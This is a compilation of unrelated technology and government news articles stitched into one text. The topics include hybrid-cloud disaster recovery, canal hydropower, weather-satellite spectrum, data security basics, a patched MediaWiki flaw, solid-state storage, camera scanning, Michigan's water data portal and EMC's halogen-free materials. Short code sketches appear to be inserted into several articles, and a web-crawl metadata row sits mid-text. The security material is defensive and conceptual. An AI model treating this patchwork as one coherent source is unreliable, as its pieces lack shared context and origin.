BC/DR (business continuity and disaster recovery) plans don't have much chance of working when confined to a single physical data center. These essential business operations are more likely to succeed if there is a bridge to a physically separated facility. While there are a host of concerns when executing a BC/DR move across data centers, this could be a use case for bridging a private and public cloud. Bridging to support peak demand or BC/DR also means taking into account data security, including authorized access. In addition to ensuring workload portability, the Open Data Center Alliance usage models go into detail when describing how cloud providers should be able to assure secure access while also demonstrating how identity, applications and data use are monitored to meet compliance reporting guidelines.
Challenges
These are still early days for bridging private and public clouds, which means we are uncovering potholes, both intentional and accidental. Our work at eWEEK Labs has shown that synchronizing workloads on private and public cloud platforms can be tricky. For example, an application workload created as a VMware virtual machine, which results in a .VMDK (Virtual Machine Disk Format) file, must be converted to an AMI (Amazon Machine Image) in order to run on Amazon's EC2 (Elastic Compute Cloud). It's possible to convert most workloads from one format to another, but this must be taken into account up front in order to minimize problems. This points to the importance of separating the application from the underlying image in order to increase deployment flexibility.
There is a fair amount of trepidation about the suitability of a public cloud infrastructure for running workloads that handle regulated data. While the unease is warranted in the short term, regulatory concerns will likely be overcome in the medium term. IT managers should ask questions that show that a public cloud provider can meet the same level of compliance as a private cloud. Once these questions have been resolved, a private/public bridge project can be assessed on its technical and cost merits.
The disquiet about bridging private and public cloud infrastructure likely also arises from the newness of cloud computing. Amazon's EC2 exited beta in 2008, and IAAS and PAAS for the enterprise are emerging technologies. The fact that NIST and the ODCA have just in the last month released drafts and first versions of their guidelines tells us this is an area for early adopters, an area that is often foreign to enterprise IT managers. Even though the idea of using private and public cloud resources in concert is new territory, the technique is fertile ground for organizations in the market for an IT competitive edge.
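As an illustration of the conversion step described above, here is a minimal sketch of how a .VMDK exported from the private cloud might be imported as an AMI using the AWS VM Import service through boto3. The bucket, key, and description are placeholders, and IAM role setup, error handling, and polling loops are omitted.

```python
# Minimal sketch, assuming the AWS VM Import path via boto3: the exported .VMDK
# is staged in S3 and registered as an AMI. Bucket, key, and description are
# placeholders; IAM role setup, error handling, and retry logic are omitted.
import boto3

ec2 = boto3.client("ec2")

response = ec2.import_image(
    Description="web-tier VM migrated from the private cloud",  # placeholder
    DiskContainers=[
        {
            "Description": "boot disk",
            "Format": "vmdk",
            "UserBucket": {
                "S3Bucket": "example-migration-bucket",   # placeholder bucket
                "S3Key": "exports/web-tier-disk1.vmdk",   # placeholder key
            },
        }
    ],
)

# The import runs asynchronously; check on it until an AMI ID appears.
task_id = response["ImportTaskId"]
print(ec2.describe_import_image_tasks(ImportTaskIds=[task_id]))
```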
Researchers in Colorado are investigating the potential for the state’s irrigation canals to be used as a source of renewable hydropower.
Engineering firm Applegate Group Inc. and Colorado State University have received a $50,000 grant from the Colorado Department of Agriculture to look into generating hydropower from the 3 million acres of irrigated land in the state. The grant is part of the Advancing Colorado's Renewable Energy Program to promote energy-related projects beneficial to Colorado's agriculture industry.
Hydropower is created by running water through a hydraulic turbine that spins and drives a generator shaft to create electricity. Most small hydro projects, also called micro-hydro, divert a portion of a river or creek’s flow, or are constructed on established channels, such as irrigation ditches.
Currently about 10 percent of U.S. electricity comes from hydropower, according to the Colorado Renewable Energy Society. Compared to other renewable energy sources, hydropower is known for being consistent and durable.
Recent technological advancements in small hydro — the development of hydroelectric power on a scale serving a small community — have made Colorado irrigation canals a likely possibility for hydro development, said Colorado State University professor Daniel Zimmerle, who received the grant.
“In the small hydro area, [Colorado has] a good chance of being a leader because we have a lot of state and local support for the idea,” Zimmerle said. “It helps to be in mountains.”
Zimmerle and researchers will study how efficient and plausible low-head hydropower, which uses river current and tidal flows to produce energy without the use of a dam, is in hundreds of statewide irrigation ditches with drops between five feet and 30 feet.
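The power available from such a drop follows the standard hydropower relation P = rho x g x Q x H x eta. A back-of-the-envelope sketch, using illustrative flow, head, and efficiency figures rather than data from the study, looks like this:

```python
# Back-of-the-envelope output for a low-head canal drop using P = rho * g * Q * H * eta.
# The flow, head, and efficiency figures are illustrative assumptions, not study data.

RHO = 1000.0   # water density, kg/m^3
G = 9.81       # gravitational acceleration, m/s^2

def hydro_power_kw(flow_m3_s, head_m, efficiency=0.7):
    """Return electrical output in kilowatts for a given flow, head, and efficiency."""
    return RHO * G * flow_m3_s * head_m * efficiency / 1000.0

# A 10-foot (~3.05 m) drop passing 2 cubic metres per second at 70% overall efficiency:
print(round(hydro_power_kw(2.0, 3.05), 1), "kW")   # roughly 42 kW
```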
The costs and environmental impacts of constructing a dam make traditional hydroelectric projects difficult. However, small hydro costs are similar to other renewable energy sources, Zimmerle said.
In terms of wiring the hydro facility to be managed remotely and connected to the electric grid, all conversion inverters and communications equipment that have been used for other applications will be reapplied to small hydro, he said.
“Once you get those big rocks in place, there are actually quite a few questions about economic viability and how you implement these systems,” said Zimmerle. “That’s where we are going to go after this research project is over.”
Until recently, “tortuous” government permitting processes, along with the large initial cost of the systems, have been the biggest barriers to implementing hydro technology, said Zimmerle. Plus, water resources can be particularly troublesome in terms of water rights issues and flow rates, he added.
However, as barriers to renewable energy sources have been knocked down over the past decade, more opportunity for micro-hydro has also become available, he said, and legislators have been green energy promoters.
Small hydro technology may also prove to be a revenue source for irrigation companies, researchers said.
The Obama administration’s plan to share weather satellite frequencies with commercial cellular carriers could severely degrade scientists’ ability to forecast hurricanes and monitor flooding, weather and spectrum experts told Nextgov.
The Federal Communications Commission proposed reallocating spectrum used by weather satellites in the 1675-1710 MHz band for commercial use in its 2010 National Broadband plan, a shift widely opposed by weather organizations worldwide.
FCC and the National Telecommunications and Information Administration narrowed the portion of the weather spectrum up for grabs to the 1695-1710 MHz band and endorsed sharing that band with commercial users at an August 2012 spectrum planning meeting.
John Snow, professor of meteorology at the University of Oklahoma, said this plan could interfere with the reception of data from sounding instruments on Geostationary Operational Environmental Satellites that measure atmospheric temperatures, cloud cover, moisture and humidity.
The National Weather Service cranks the data from these instruments into numerical models on its supercomputers to develop forecasts, including those used this week to predict the path of Hurricane Sandy, Snow said.
Weather satellite instruments play a key role in assessing conditions over oceans -- where hurricanes form -- as forecasters do not have any other means of measuring key parameters, as they do over land, Snow said.
The Weather Service also uses instrument data from the European Metop weather satellites. In 2010, Michel Jarraud, secretary general of the World Meteorological Organization, told FCC that reallocation of weather satellite spectrum could degrade the ability of forecasters to track hurricanes.
GOES transmits raw sounding data at a frequency of 1696 MHz and European satellites use downlink frequencies in the 1701-1707 MHz band. Snow said he does not believe the technology exists today that would allow sharing of weather satellite spectrum with cellular carriers without causing interference to what he called “key sensing systems.”
The spectrum sharing plan also could imperil signals transmitted from the GOES satellite for the Emergency Managers Weather Information Network, which transmits data at 1692.7 MHz and can be received on simple, inexpensive antenna systems connected to a PC. This data stream includes daily weather forecasts, severe storm warnings, flash flood warnings and even iceberg reports.
FCC wants to determine if weather satellite data could be downloaded to a small number of satellite dishes protected from interference by commercial cellular towers, with the data then transmitted over the Internet. Snow pointed out this approach would work only up until the point that rain flooded basements containing Internet hardware.
The U.S. Geological Survey operates a national network of 3,072 stream gauges to monitor water levels and potential floods, with data downlinked at a frequency of 1694.5 MHz from the GOES satellite, or just below the frequency FCC and NTIA want to share with commercial carriers.
Bernie Skoch, a telecommunications and computer consultant, said this is too close for comfort, as poorly designed receivers could interfere with the signals. Robert Mason, acting chief of surface water for the Geological Survey, said any interference from commercial carriers “could put us out of business.”
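The numbers quoted in this article make the proximity easy to see. The short sketch below simply compares each cited downlink frequency against the proposed 1695-1710 MHz shared band; it is illustrative arithmetic, not an interference analysis.

```python
# Illustrative arithmetic only: compare the downlink frequencies cited above with
# the 1695-1710 MHz band proposed for sharing. This is not an interference study.
SHARED_BAND = (1695.0, 1710.0)  # MHz

downlinks_mhz = {
    "GOES raw sounding data": (1696.0, 1696.0),
    "European Metop satellites": (1701.0, 1707.0),
    "Emergency Managers Weather Information Network": (1692.7, 1692.7),
    "USGS stream gauges via GOES": (1694.5, 1694.5),
}

for name, (lo, hi) in downlinks_mhz.items():
    if hi >= SHARED_BAND[0] and lo <= SHARED_BAND[1]:
        print(f"{name}: inside the shared band")
    else:
        margin = min(abs(SHARED_BAND[0] - hi), abs(lo - SHARED_BAND[1]))
        print(f"{name}: outside the band, {margin:.1f} MHz of separation")
```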
Heather Phillips, an NTIA spokeswoman, said in an email statement that NTIA “recognizes the critical role that weather satellites play in tracking and monitoring potentially life-threatening storms, such as Hurricane Sandy. We are continuing our work to protect the critical sites that operate in the 1695-1710 MHz band, which have been identified for reallocation."
That’s not enough, said Skoch. In an era of climate change, weather satellites are mission-critical systems that need more -- not less -- spectrum, he said.
Electronic data resides in two basic areas:
- In bulk in some form of repository, such as a database or collections of individual files (called data at rest)
- In small quantities being transmitted over a network (called data on the wire)
Your data is vulnerable no matter where it resides. While most companies take security precautions, many of those precautions turn out to be insufficient to protect valuable corporate assets. The key lies in knowing where vulnerabilities exist and making appropriate risk-based decisions.
The ability to gather and share volumes of information was the primary reason behind the creation of the Internet, but such wide availability greatly magnifies the risk of that information being compromised. Attacks against large databases of critical information are on the rise, such as in the following recent cases:
- February, 2003: A hacker broke into the security system of a company that processes credit card transactions, giving the hacker access to the records of millions of Visa and MasterCard accounts.
- June, 2004: More than 145,000 blood donors were warned that they could be at risk for identity theft from a stolen university laptop containing their personal information.
- October, 2004: A hacker accessed names and social security numbers of about 1.4 million Californians after breaking into a University of California, Berkeley computer.
NOTE – Identity theft occurs when someone uses your personal information—such as your name, social security number, credit card number, or other identifying information—without your permission, frequently to commit fraud or other crimes.
Vulnerabilities of Data on the Wire
Data on the wire is vulnerable to some very focused attacks. Data can be intercepted (sniffed). ARP attacks can be used to sniff information in a switched environment. ARP attacks can also be used to initiate “man in the middle” attacks that can allow an attacker to intercept and potentially modify information in transit.
Sniffing refers to a technique for capturing network traffic. While sniffing can be accomplished on both shared and switched networks, it’s much easier in a shared-media (hub-based) environment:
- Hubs and other shared-media devices repeat every frame to every port on the segment, leaving each attached host to pick out the traffic actually addressed to it, so any host on the segment can quietly capture everything.
- In a switched environment, switches forward traffic only to its intended host (determined by the destination MAC address in each individual frame).
Operating in a switched environment doesn’t totally alleviate the risk of sniffing, but it does mitigate that risk to a large degree.
Most networks today also utilize virtual LAN (VLAN) configurations to segment network traffic and further reduce the risk of sniffing. A VLAN is a switched network that’s logically segmented. VLANs are created to provide the segmentation services traditionally provided by routers in LAN configurations. VLANs address scalability, security, and network management. Routers in VLAN topologies provide broadcast filtering, security, address summarization, and traffic-flow management.
Just as switches isolate collision domains for attached hosts and only forward appropriate traffic out a particular port, VLANs provide complete isolation between VLANs. None of the switches within the defined group will bridge any frames—not even broadcast frames—between two VLANs. Thus, communication between VLANs is accomplished through routing, and the traditional security and filtering functions of the router can be used.
Segmentation can be organized in any manner: function, project team, application. This capability is especially useful for isolating network segments for security purposes. For example, you may place application servers on one VLAN and system administrators on another (management-level) VLAN, with access control lists to restrict administrative access to only that VLAN. This setup can be accomplished regardless of physical connections to the network or the fact that some users might be intermingled with other teams.
The Ethernet Address Resolution Protocol (ARP) enables systems to find the unique identifier (MAC address) of a destination machine. ARP attacks provide the means to either break or misuse the protocol, with the goal of redirecting traffic from its intended destination. In an ARP attack, the attacker can sniff, intercept, and even modify traffic on a compromised network segment.
The effectiveness of these attacks is limited in two ways:
- Data on the wire is generally available only in small pieces. It’s true that many systems and applications send login/password pairs in clear text (without any encryption). An attack may capture such small bits of data; it may even be possible over time to assemble enough useful information to make identity theft possible. However, the attacker must either be directly connected to the internal network, or have succeeded in compromising an internal system and installing some form of sniffer to gather information. For the effort to be worthwhile to the hacker, many small chunks would need to be captured and then filtered out of the massive volumes of traffic traversing most of today’s networks; and then the captured data would have to be reassembled into meaningful information. This is a tremendous task with a potentially very small payoff.
- Capturing data takes time. The longer the attacker is inside the network, the more likely he or she is to get caught. It’s easier to get information at the source, rather than trying to capture and decode thousands of network packets.
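On the defensive side, one common symptom of ARP spoofing is a single MAC address answering for more than one IP address, for example a host impersonating the default gateway. A minimal, illustrative check over a list of ARP entries, with made-up addresses, might look like this:

```python
# Illustrative ARP-spoofing heuristic: flag any MAC address that claims more than
# one IP on the segment (for example, a host also answering for the gateway).
# The table entries below are made up.
from collections import defaultdict

def suspicious_macs(arp_table):
    """arp_table: iterable of (ip_address, mac_address) pairs."""
    ips_by_mac = defaultdict(set)
    for ip, mac in arp_table:
        ips_by_mac[mac.lower()].add(ip)
    return {mac: ips for mac, ips in ips_by_mac.items() if len(ips) > 1}

table = [
    ("10.0.5.1", "00:1a:2b:3c:4d:5e"),   # the real default gateway
    ("10.0.5.20", "00:1a:2b:aa:bb:cc"),  # an ordinary host
    ("10.0.5.1", "00:1a:2b:aa:bb:cc"),   # same host also answering for the gateway
]
print(suspicious_macs(table))
```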
Vulnerabilities of Data at Rest
While sniffing data on the wire may yield a big reward, data at rest is the proverbial pot of gold. Most organizations maintain detailed databases of their personnel information, for example, making the large corporation a very tempting target. These databases regularly contain quantities of names, addresses, and even social security numbers for tax purposes. This is all the information that someone needs to steal your identity. Statistics show that identity theft attacks are increasing. More than thirty thousand victims reported ID theft in 2000; in 2003, the Federal Trade Commission received more than half a million complaints.
A major issue in protecting your data repository is the fact that there are so many avenues of attack. Attacks can be launched against the operating system, the database server application, the custom application interface, the client interface, and so on. Application attacks don’t have to be directed against the target application, either. Any attack providing system-level access to an attacker is a risk to your data.
Your system is also a potential target for a multitude of computer viruses, worms, and Trojans. Current reports put the number of these types of applications at more than 100,000. Many recent computer worms leave systems vulnerable by covertly installing a backdoor that enables the attacker to enter the system at will.
How Can We Protect Our Data?
How do we defend against so many possible attack vectors? The key is to focus on the data. The first step should be data-sensitivity analysis as part of an overall risk-assessment process. Data-sensitivity analysis begins by identifying an organization’s critical data and ways in which that data is used. Once the sensitivity of data has been classified, the organization can reach decisions about the necessary level of protection for that data. Your tendency may be to apply the greatest level of protection available, but that level may be neither necessary nor cost-effective. For example, you wouldn’t spend $100,000 on a firewall to protect against an expected loss of only $5,000. You can get a better idea of how to apply countermeasures if you include a loss/impact analysis as part of the risk-assessment process.
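The loss/impact analysis mentioned here is often expressed as an annualized loss expectancy (ALE), the single loss expectancy multiplied by the expected annual rate of occurrence. The figures below are hypothetical and only illustrate the comparison against the yearly cost of a control:

```python
# Hypothetical figures illustrating annualized loss expectancy (ALE = SLE x ARO)
# weighed against the yearly cost of a control.
def ale(single_loss_expectancy, annual_rate_of_occurrence):
    return single_loss_expectancy * annual_rate_of_occurrence

expected_annual_loss = ale(single_loss_expectancy=5_000, annual_rate_of_occurrence=0.5)
annual_control_cost = 100_000 / 5   # a $100,000 firewall amortized over five years

print(f"Expected annual loss:   ${expected_annual_loss:,.0f}")
print(f"Annual cost of control: ${annual_control_cost:,.0f}")
print("Control justified on loss alone:", expected_annual_loss > annual_control_cost)
```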
A simple approach to data protection looks at the various layers of security that can be applied. Consider the following starting checklist:
- Do you need to encrypt the data repository?
- Do you need a hash of the transactions for integrity purposes? (See the sketch after this checklist.)
- Should you digitally sign transactions?
- Make sure that database logging is enabled and properly configured.
- Harden the operating system.
- Disable unnecessary services and close ports.
- Change system defaults.
- Don’t use group or shared account passwords.
- Lock down file shares.
- Restrict access to only necessary personnel.
- Consider host-based firewalls and intrusion detection for critical servers.
- Maintain proper patch procedures.
- Use switches rather than routers or hubs as much as possible.
- Lock down unused router/switch ports.
- Consider MAC filters for critical systems.
- Establish logical subnets and VLANs.
- Set up access control lists (ACLs) for access routes.
- Use ingress/egress filters, anti-spoof rules.
- Determine appropriate location and functionality for network-based firewalls and intrusion detection.
- Use encrypted logins or SSL for web-based sessions.
Physical security for data:
- Establish input/output handling procedures.
- Use physical access logs for server rooms and network operations centers.
- Document tape-handling procedures, tape rotation, offsite storage.
- Consider an alternate data center.
- Archiving: Where does your data go to rest in peace?
- Data destruction: Degauss, erase/overwrite, physical destruction?
- How is data handled when equipment is sent out for repair, replacement, or end of life?
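To illustrate the hashing and signing items flagged earlier in the checklist, the sketch below computes a stable SHA-256 digest of a transaction record and a keyed HMAC using Python's standard library. The record fields and key are placeholders; real deployments need managed keys and, where appropriate, asymmetric digital signatures.

```python
# Minimal illustration of the hashing and signing items above using Python's
# standard library. The record fields and key are placeholders.
import hashlib
import hmac
import json

SECRET_KEY = b"replace-with-a-managed-key"   # placeholder only

def transaction_digest(record):
    """Stable SHA-256 hash of a transaction, usable for integrity checks."""
    canonical = json.dumps(record, sort_keys=True).encode()
    return hashlib.sha256(canonical).hexdigest()

def transaction_mac(record):
    """Keyed HMAC, so tampering requires knowledge of the key."""
    canonical = json.dumps(record, sort_keys=True).encode()
    return hmac.new(SECRET_KEY, canonical, hashlib.sha256).hexdigest()

record = {"id": 1042, "account": "A-7731", "amount": 250.00}
print(transaction_digest(record))
print(transaction_mac(record))
```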
This is just a quick list of points to consider. Fortunately, folks much smarter than I am have developed a much more comprehensive approach.
Security standards and guidance are available, especially for organizations that are part of or do business with the U.S. government. Through the work of various organizations, the government has put together a program known as Certification & Accreditation (C&A). Standards have been and continue to be developed that provide guidance on the performance of risk assessments, development of security plans, and the application of security controls.
The Computer Security Division of the National Institute of Standards and Technology (NIST) has been assigned this important multi-part task:
- Improving federal information-systems security by raising awareness of IT risks, vulnerabilities, and protection requirements, particularly for new and emerging technologies.
- Researching, studying, and advising agencies of IT vulnerabilities and devising techniques for the cost-effective security and privacy of sensitive federal systems.
- Developing standards, metrics, tests, and validation programs.
- Developing guidance to increase secure IT planning, implementation, management, and operation.
The C&A process is explained and documented in NIST’s publications. NIST’s guidelines provide an excellent framework for selecting, specifying, employing, and evaluating the security controls in information systems.
Data is under constant attack from a growing number of sources. It’s vital that you know what data you have, how sensitive that data is, how critical it is to your corporate mission, and the risks it faces. Perform a risk assessment, and, once the threat level has been determined, develop an appropriate plan to protect that data with multiple layers of security. Only by being aware of your valuable assets can you properly monitor and protect them.
The possibility of Wikipedia being taken over by attackers was just closed off by quick action on the part of the Wikimedia Foundation, the nonprofit that operates Wikipedia, with the help of Check Point, the security firm that discovered the critical security hole in the site's code.
"It is conceivable that someone who discovered this vulnerability could have executed code that may have made it possible to access user data," says Wikimedia Foundation spokesman Jay Walsh. But it was Check Point researchers who discovered this vulnerability first in the MediaWiki project Web platform, which is open-source code used to create and maintain wiki websites.
Check Point says what its researchers uncovered was a remote-code execution flaw in MediaWiki 1.8 onwards, through which an attacker could potentially gain complete control of the vulnerable web server. A patch "was applied to the software within 45 minutes of discovery," says Walsh. Wikimedia has also released the patch today so others can apply it to the open-source code as well.
This is only the third time since 2006 that a remote-code execution flaw had been identified in MediaWiki open-source code. If an attacker had discovered it first, then it would have been a "zero-day" vulnerability without a patch, says Patrick Wheeler, head of threat prevention product marketing at Check Point.
Check Point says if the vulnerability hadn't been discovered and fixed, an attacker could have been able to control the Wikipedia.org web server or any other wiki site running on MediaWiki, and potentially inject and serve malicious code to users visiting those sites.
This would have been a disaster to the millions of visitors to the site each month, and a blow to the respected open-source project that has helped foster the popular online Wikipedia encyclopedia.
Charles Henderson, director of application security services in Trustwave's SpiderLabs research division, says it's not that vulnerabilities are "necessarily better or worse" in open source as compared with closed source, proprietary code. The point is that open source code has become so widely used, including by business, any serious security issues in it that crop up can't be ignored.
Some open-source projects do a good job of managing security updates, says Henderson, while others seem more lax. But the openness of how code is developed and if necessary, patched, means that attackers can monitor open source development fairly easily, he says.
Sonatype CEO Wayne Jackson says the security of open-source code is getting more attention from those in the federal government, for example, who want to know more about how it gets developed. Jackson says there have been a string of security incidents associated with identified open-source vulnerabilities, such as last summer when a vulnerability in the Apache Struts web application framework was sold as an automated attack script in Chinese circles online. The Struts vulnerability was also tied to a cyber-intrusion into a Chicago-based trading exchange around that time, Jackson adds.
It's not unusual to find commercial software of one sort or another integrating open source. Jackson says one example is Sydney, Australia-based firm Atlassian which last summer publicly identified the Struts critical vulnerability in its software. He pointed out that Cisco also issued a security advisory last October related to Apache Struts remote-code execution vulnerability in its products.
It's often simple to identify sites built on open-source code such as Struts through a Google search, Jackson says.
Open-source code represents the modernization of software development, based on the idea of a "meritocracy" of achievement by software developers contributing into code they all share, Jackson says. But the downside is that "the ecosystem has treated open source like this huge sugar store, living off the sugar high of productivity."
One basic question about open-source is whether the organizations making use of it are even aware of it. "It's a fundamental problem," says Jackson. Sometimes it seems like the "bad guys are way more efficient than the good guys" in keeping track of open-source developments and usage.
SSS (solid-state storage) is a general term that is more applicable because memory-based storage can come in a variety of configurations. SSD (solid-state drive) is a very specific term that should be limited to memory-based storage that happens to be in a hard drive form factor. The advantage of SSD, of course, is that it can, for the most part, be installed in anything that formerly accepted a hard drive. If you want to upgrade the hard drive in your laptop or server, you can pull out the hard drive and replace it with an SSD.
SSD technology is also the path that many storage system manufacturers have chosen to quickly deliver memory-based storage to their customers. They can use their existing storage shelves that used to hold hard drives and now place SSDs into them. There are issues with integrating SSD into legacy architectures, as we detail in our article "SSD in Legacy Storage Systems"; these include the possibility that the shelf or the controller architecture may not be able to sustain the performance capabilities of a whole shelf full of SSDs. In essence, memory-based storage acts as a bottleneck exposer.
This performance concern has led to the growth of a wide range of options in the SSS market. There are PCIe-based SSS devices, which eliminate many of the bottleneck variables by removing the latency caused by the storage network. There are challenges, however, in sharing PCIe SSS across multiple servers, which applications like clustering and virtualization require.
Another option is to use SSS appliance-based systems that put memory-based storage into an appliance and make it available like any other block device attached to the storage network via Fibre Channel or 10-Gbps Ethernet. These systems often don't use the SSD form factor, but instead use memory modules or custom boards so that greater density can be achieved. Shared SSS appliances, of course, have to deal with the storage network as well as develop their own internal switching architectures so that the packaging of the appliance itself does not become an inhibitor to performance.
As we will discuss in our upcoming webcast "Understanding SSD Performance," there is more to performance than how fast the devices are. How SSS is packaged will be one of the key factors in determining performance. Because it is memory, the device is now so fast that it exposes all the other weaknesses in the performance chain, and it is up to suppliers to develop technology that removes those bottlenecks.
Image scanning techniques
Interlaced scanning and progressive scanning are the two image scanning techniques available today for reading and displaying information produced by image sensors. Interlaced scanning is used mainly in CCDs. Progressive scanning is used in either CCD or CMOS sensors. Network cameras can make use of either scanning technique. (Analog cameras, however, can only make use of the interlaced scanning technique for transferring images over a coaxial cable and for displaying them on analog monitors.)
When an interlaced image from a CCD is produced, two fields of lines are generated: a field displaying the odd lines, and a second field displaying the even lines. However, to create the odd field, information from both the odd and even lines on a CCD sensor is combined. The same goes for the even field, where information from both the even and odd lines is combined to form an image on every other line.
When transmitting an interlaced image, only half the number of lines (alternating between odd and even lines) of an image is sent at a time, which reduces the use of bandwidth by half. The monitor, for example, a traditional TV, must also use the interlaced technique. First the odd lines and then the even lines of an image are displayed and then refreshed alternately at 25 (PAL) or 30 (NTSC) frames per second so that the human visual system interprets them as complete images. All analog video formats and some modern HDTV formats are interlaced. Although the interlacing technique creates artifacts or distortions as a result of ‘missing’ data, they are not very noticeable on an interlaced monitor.
However, when interlaced video is shown on progressive scan monitors such as computer monitors, which scan lines of an image consecutively, the artifacts become noticeable. The artifacts, which can be seen as “tearing”, are caused by the slight delay between odd and even line refreshes as only half the lines keep up with a moving image while the other half waits to be refreshed. It is especially noticeable when the video is stopped and a freeze frame of the video is analyzed.
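The artifact is easy to reproduce. The sketch below weaves two half-height fields into a full frame with NumPy; because the example's vertical bar shifts between the two field captures, the woven frame shows the serrated "comb" edge described above. The frame size and the amount of motion are arbitrary illustrations.

```python
# Illustrative weave of two interlaced fields into one frame with NumPy. Because
# the fields are captured a field-time apart, the example's moving bar lands in
# different positions in each field, producing a serrated edge in the woven frame.
import numpy as np

def weave(odd_field, even_field):
    """Interleave two (H/2, W) fields into a full (H, W) frame."""
    h, w = odd_field.shape
    frame = np.empty((2 * h, w), dtype=odd_field.dtype)
    frame[0::2] = odd_field    # lines 1, 3, 5, ... (1-indexed odd lines)
    frame[1::2] = even_field   # lines 2, 4, 6, ...
    return frame

odd = np.zeros((288, 352), dtype=np.uint8)
even = np.zeros((288, 352), dtype=np.uint8)
odd[:, 100:110] = 255    # a bright vertical bar ...
even[:, 104:114] = 255   # ... that has shifted 4 pixels by the second field
print(weave(odd, even).shape)   # (576, 352), with a combed bar edge
```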
With a progressive scan image sensor, values are obtained for each pixel on the sensor and each line of image data is scanned sequentially, producing a full frame image. In other words, captured images are not split into separate fields as with interlaced scanning. With progressive scan, an entire image frame is sent over a network and when displayed on a progressive scan computer monitor, each line of an image is put on the screen one at a time in perfect order. Moving objects are, therefore, better presented on computer screens using the progressive scan technique. In a video surveillance application, it can be critical in viewing details of a moving subject (e.g., a person running away). Most Axis network cameras use the progressive scan technique.
- At left: a full-sized JPEG image (704x576 pixels) from an analog camera using interlaced scanning.
- At right: a full-sized JPEG image (640x480 pixels) from an Axis network camera using progressive scan technology.
Both cameras used the same type of lens and the speed of the car was the same at 20 km/h (15 mph). The background is clear in both images. However, the driver is clearly visible only in the image using progressive scan technology.
The Department of Environmental Quality, in cooperation with the Department of Natural Resources and Department of Information Technology, Tuesday announced the availability of the Michigan Surface Water Information Management (MiSWIM) system.
The MiSWIM system is a new, state-of-the-art Internet mapping application designed to provide the public easy access to water quality (biological, chemical, and physical) data and other information that has been obtained for Michigan's rivers, lakes and streams. Types of water quality information available to MiSWIM system users include: water and sediment chemistry, fish contaminants, E. coli bacteria, fish and aquatic macroinvertebrate communities, river flow, fish stocking, lake bathymetry, river valley segments, industrial and municipal wastewater discharge sites, septage land disposal sites, coldwater and natural river classifications, nonpoint source program grants, land use classifications, soil types, and aerial photographs.
"The MiSWIM system will allow the public and water resource managers to obtain water quality data and information for Michigan's rivers, streams, and lakes more easily and more efficiently," said DEQ Director Steven E. Chester. "Better access to this information through the MiSWIM system will improve water quality decision making at all levels of government."
"MiSWIM will provide a great tool for natural resource managers and citizens interested in natural resource issues to see how a water resource has been managed," DNR Director Rebecca Humphries said. "It will also aid recreational enthusiasts and anglers interested in different bodies of water by showing them a wide array of information regarding a lake, stream, or river." | <urn:uuid:c0b830c1-6026-4d97-af63-1ca20526847f> | CC-MAIN-2017-09 | http://www.govtech.com/geospatial/102478739.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170696.61/warc/CC-MAIN-20170219104610-00646-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.907695 | 325 | 2.90625 | 3 |
Material & Resource Use
PRODUCT MATERIAL CONTENT
Information technology (IT) devices contain substances that are essential to the functionality and safe use of the product, but some of them can adversely impact ecological and human health when not properly managed. To protect people and the environment, EMC takes a proactive approach to minimizing the use of these substances in our products by researching and, where feasible, substituting alternative materials. We also take measures to prevent these substances from entering the natural ecosystem. To learn more, visit Product End-of-Life.
DESIGN FOR ENVIRONMENT
The EMC® Design for Environment (DfE) program incorporates environmental considerations throughout product design. EMC engineers take what we have learned about the environmental impact of existing product designs and use that knowledge to implement best practices for ongoing design. To learn more, visit Efficient Products.
To eliminate environmentally sensitive materials in our products, viable alternatives must be found. When we believe that a material may be of concern, we take a precautionary approach by exploring alternatives that are safer for ecological and human health. We prioritize the substances to assess, and then collaborate across the industry and academia to identify and qualify alternatives that meet the same or higher standards of reliability, cost-effectiveness, performance, and availability as the materials we currently use. We implement substitutes in new designs where feasible.
Flame retardants in IT products are essential for product functionality and human safety. Halogens are an ingredient in flame retardants commonly used in laminates for printed circuit boards (PCBs), but there are concerns about halogens’ impact on the environment and human health. EMC has been working for several years to identify halogen-free substitutes that meet the rigorous technical requirements for our products.
In 2011, EMC successfully shifted the majority of its new PCBs to a halogen-free material. However, that halogen-free substitute could not be used in our high-performance PCBs, which have more stringent requirements. Because a suitable halogen-free substitute did not exist on the market, EMC decided to develop a solution.
In the spring of 2012, EMC invited chemists and engineers from a PCB manufacturer and a laminate supplier to work with EMC on this challenge. EMC set the vision to identify, test, and implement a new flame retardant that is halogen-free, meets the technical requirements of our high-performance PCBs, and is affordable to implement. EMC’s own experts in PCB design, signal integrity, and electrical and mechanical engineering participated in the project.
By the end of 2012, this collaborative group identified a halogen-free material that meets EMC’s requirements and will be implemented on our high-performance PCBs in 2013.
Originally, EMC was the only customer for these halogen-free substitutes. Today, our suppliers report that there is significant interest from other companies. By driving this effort with our suppliers to identify these substitutes, EMC is not only helping our own business, but also the rest of the industry and the planet’s ecosystem.
EMC participates in the U.S. Environmental Protection Agency (EPA) Partnership on Alternatives to Certain Phthalates, a project of their Design for Environment Program. This project has identified eight phthalates of high concern and a list of potential alternatives. We are currently working with our suppliers to evaluate these and other alternatives for use in our products. We are also members of the Green Chemistry and Commerce Council (GC3), which is conducting tests of alternative materials to determine human toxicity. In 2013, we intend to identify substitutes for those eight phthalates identified by the EPA, with the intent to implement changes in 2014.
FULL MATERIAL DISCLOSURE
EMC’s Full Material Disclosure (FMD) database catalogs the substances used in EMC products. This database enables us to quickly and easily identify the presence of substances—when there are new regulations regarding their use—and to respond more rapidly to those requirements. It also helps with identifying where “conflict minerals” (tin, tantalum, tungsten, and gold) are used in our products so that we can trace their source. To gather this information, we ask suppliers to identify materials used in every part of EMC products by CAS number (a unique identifier for chemical substances).
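The payoff of such a database is that a newly regulated substance can be located across the product portfolio with a simple query on its CAS number. The sketch below is purely hypothetical: the parts, concentrations, and schema are invented, and only the CAS numbers themselves (TBBPA, DEHP, gold) are real.

```python
# Purely hypothetical FMD-style lookup: find every part containing a newly
# restricted substance by CAS number. Parts, concentrations, and the schema are
# invented; only the CAS numbers themselves are real.
fmd_records = [
    {"part": "PCB-1101", "substance": "TBBPA", "cas": "79-94-7",   "ppm": 12000},
    {"part": "CBL-2203", "substance": "DEHP",  "cas": "117-81-7",  "ppm": 900},
    {"part": "FAN-3302", "substance": "Gold",  "cas": "7440-57-5", "ppm": 40},
]

def parts_containing(cas_numbers, records):
    return [r for r in records if r["cas"] in cas_numbers]

newly_restricted = {"117-81-7"}   # e.g., a phthalate added to a restriction list
for hit in parts_containing(newly_restricted, fmd_records):
    print(hit["part"], hit["substance"], hit["ppm"], "ppm")
```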
